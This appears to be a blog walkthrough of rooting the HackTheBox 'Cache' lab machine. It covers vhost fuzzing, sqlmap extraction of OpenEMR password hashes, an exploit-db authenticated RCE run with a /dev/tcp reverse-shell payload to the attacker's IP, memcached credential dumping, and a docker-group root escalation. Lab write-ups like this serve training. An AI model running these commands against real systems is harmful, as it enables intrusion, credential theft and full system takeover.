Cache HackTheBox Walkthrough
This is Cache HackTheBox Walkthrough. In this walkthrough I will demonstrate step by step procedure how I rooted to Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188
and is given difficulty level medium
by its maker. Let’s begin. Connect your machine with VPN and confirm by pinging the IP 10.10.10.188.
I started by scanning the IP 10.10.10.188 so that I could get some starting point to proceed. Nmap
[a popular port scanner] gave the following result.
Scanning
$nmap -sV -sC -oA scan 10.10.10.188
Nmap revealed that ports 22, 80, and 30000 are open and SSH
, Apache Web Server
, and Memcached
[a general purpose distributed memory-caching system] services are running over them respectively. After going to URL http://10.10.10.188/author.html found a name ash
. Added it to my notes as it may be a user of the box. Nothing interesting found so tried to directory brute force
.
Directory brute forcing
$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Directory brute forcing revealed two folders javascript
and jquery
.
Access to http://10.10.10.188/javascript/
gives access denied
And http://10.10.10.188/jquery/functionality.js
revealed
From above file got the credential ash: H@v3_fun
Used the credential at URL http://10.10.10.188/login.html
. After login got nothing interesting except an image of magician
Tried to create custom wordlist using cewl.
Custom Wordlist Create
$cewl -w custom_wordlist.txt -d 10 -m 1
http://10.10.10.188/author.html
Tried to WFUZZ
for domain names with the custom wordlist which we have created.
Fuzzing For domain
$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
Got 302
response at word HMS
. Added hms.htb
to my /etc/hosts
file in case if there is Virtual Hosting
enabled we can get something more to enumerate.
Hosts file before modification
Hosts file after modification
Ongoing to http://hms.htb
found that it is running OpenEMR
software [a medical practice management software which also supports Electronic Medical Record] is running and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to login with default credential admin: pass
, but could not login.
Tip: During CTF hunting and penetration testing whenever you get any popular software or web app always try to login with default credential because sometimes administrator forget to change its default credentials.
As I found any known software
then my next step is to find its version
so that I could get information about public exploit. After a lot of enumeration couldn’t get its version. At the footer of the login page at http://hms.htb/interface/login/login.php?site=default got copyright
information is outdated.
So I am guessing that this software was last updated in 2018. And public exploit
before 2018 may work on it. After seeing the release history
it appears that the current version is 5.0.1 or less
than this.
As soon as I get the software name and its version my next step is to find the available public exploit.
Searching Public Exploit
$searchsploit openemr 5.0.1
Searchsploit gives there is an authenticated RCE
. So, we require Username
and Password
of the openEMR software to get Remote Code Execution
. After some googling got this file on openEMR website https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf which reveals that OpenEMR 5.0.1 has multiple vulnerability. And SQL Injection was among them.
According to pdf file there is a GET based SQL injection
vulnerability at URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you to read the pdf file to know more.
Dump username and password
Capture request in file named request.txt
using burp suite
$sqlmap -r request.txt --dbs --batch
$sqlmap -r request.txt -D openemr --tables
$sqlmap -r request.txt -D openemr -T users_secure --dump
Got the credential
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
from the database openemr
. After identifying the hash got that it is bcrypt
hash.
Cracked the hash using
Debycrypt
tool.
$git clone https://github.com/BREAKTEAM/Debcrypt.git
$cd Debcrypt/
$python3 crack.py
HASH: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B
So the Credential is openemr_admin: xxxxxx
[six times small x]
Tip: Always try to use tool which is assigned for dedicated work rather than using those tool which is for many number of operations. This will increase the efficiency and accuracy. For example to crack bcrypt hash I have used Debcrypt, a tool to crack bcrypt hash rather than using Hashcat or JohnTheRipper
Since we already know that there is an authenticated RCE exploit exists for openemr software. Let’s use it by mirroring
it on our PC from exploit-db
database.
Mirror exploit
$searchsploit openemr 5.0.1
$searchsploit -m exploits/php/webapps/45161.py
$mv 45161.py openemr_rce.py
Getting Shell
$nc -nvlp 1234
// In separate window
$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'
Upgrade the shell to fully qualified Linux Shell
Shell Upgrade
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
Got two users ash
and luffy
inside /home/
directory. Easily switched to user ash using $su ash
. Enter the creds which we have captured from http://10.10.10.188/jquery/functionality.js file i.e., H@v3_fun
$su ash
Password: H@v3_fun
Grab User Flag
$cat /home/ash/user.txt
PRIVILEGE ESCALATION
Tried to run $sudo -l
to check if ash has any special permission, but got error because user ash is not configured inside sudoers
file.
linpeas.sh
[a post exploitation enumeration script] revealed that user luffy
is the part of docker
group.
After googling docker privilege escalation
found this and this interesting articles. But the problem is this that docker can only be run by user luffy
because luffy is part of docker group. And we can’t switch to luffy using $su luffy
because we don’t have it’s credential. So we need the password
of luffy. Wait, we have memcached
server running on port 30000
.
After googling Penetration testing on memcached server
found this article . Followed the steps as discussed in the article and got the credentials of luffy. Remember
all these steps are needed to be done on remote cache machine.
$netstat -alnop
revealed that memcached server is listening on port 11211
locally. So we have to connect to it using telnet
to get some information.
$telnet 127.0.0.1 11211
~version
~stats
~stats slab
~stats items
~stats cachedump 1 0
~get user
~get passwd
So the credential is luffy: 0n3_p1ec3
. Exit from the telnet and switched the user to luffy.
$su luffy
Password: 0n3_p1ec3
Getting Root
Lastly run
$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
to get root.
Capture Root Flag
$cat /root/root.txt
This is how I rooted to the cache machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Having any issue feel free to comment us. Want to give any suggestion please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com